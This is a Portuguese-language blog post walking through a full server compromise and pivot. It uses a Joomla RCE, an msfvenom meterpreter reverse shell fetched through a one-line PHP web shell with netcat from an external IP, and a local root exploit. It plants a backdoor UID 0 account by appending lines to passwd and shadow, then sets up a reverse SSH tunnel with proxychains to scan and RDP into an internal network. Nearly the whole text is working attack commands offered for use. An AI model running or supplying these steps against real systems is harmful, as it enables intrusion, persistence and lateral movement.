PIVOTING PART 2: ADVANCED: PENETRATION TESTING + REVERSE SSH TUNNEL + RDP

Exemplo de conseguir um shell em um servidor vulneravel
Exploiting CVE-2015-8562 (A New Joomla! RCE)

Exploiting CVE-2015-8562 (A New Joomla! RCE)

Criando uma exploit com o msfvenom
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP_EXTERNO LPORT=7000 -f elf > linuxexploit
Enviando o exploit com o netcat
$ nc -lvp 7000 < linuxexploit
Recebendo o exploit no servidor com um shell php
Navegador: http://servidor.vuneravel.com/shell.php?cmd=nc SEU_IP_EXTERNO 8000 > exploit
source da shell.php : < ?php system($_GET[‘cmd’]); ?>
Local Root Exploit
Ubuntu 12.04.5 LTS
Link: https://www.exploit-db.com/exploits/37292/
Upando exploitroot.c para o servidor com o meterpreter
meterpreter> upload exploitroot.c
Obs: o exploitroot.c esta na pasta home, se você tiver colocado em outro diretoria digite o caminho completo
Compilando e executando o exploitroot no servidor
use shell
$ gcc exploitroot.c -o exploitroot
$ ./exploitroot
Criando um usuario no servidor
use shell
Fazendo backup dos aquivos
# cp passwd passwd.bkp
# cp shadow shadow.bkp
# cp group group.bkp
Criando uma conta
# echo “rita:x:0:0:root:/:/bin/bash” >> passwd
# echo “rita:E9lQChXRn9sc:16781::::::” >> shadow
# echo “rita:x:102:” >> group
Adicioando uma senha para o novo usuario
# passwd rita
Logando no ssh com o novo usuário
$ ssh username@enderecoIPservidor
-p para outras porta configurado no ssh use sem para porta padrão
Criando chaves ssh
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key
Chave de autenticação
ssh-keygen -t rsa , adiocione uma palavra pass
Enviando a chave para um host remoto
scp id_rsa.pub <user>@<yourhost>:.ssh/authorized_keys
Iniciando o Túnel Reverso
# ssh -N -R 2222:localhost:22 username@bouncebox -f
Em bouncebox, Lembre-se de corrigir para o endereço de ip correto e usuario  e senha também
feche a conexao ssh
Estabelecer conexões com o Túnel SSH reverso para localhost do servidor
$ ssh -L 31337:localhost:2222 username@bouncebox
-L encaminha uma porta no seu pc
$ ssh -D 1080 bob@localhost -p 31337
-D encaminha uma porta no seu pc para uso com proxychains
Usando ProxyChains + nmap + rdesktop
Edite /etc/proxychains.conf
edite a ultima linha enserindo a porta 1080
proxychains nmap -Pn -sT 192.168.2.72 -p 445,3389
proxychains rdesktop 192.168.2.72

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s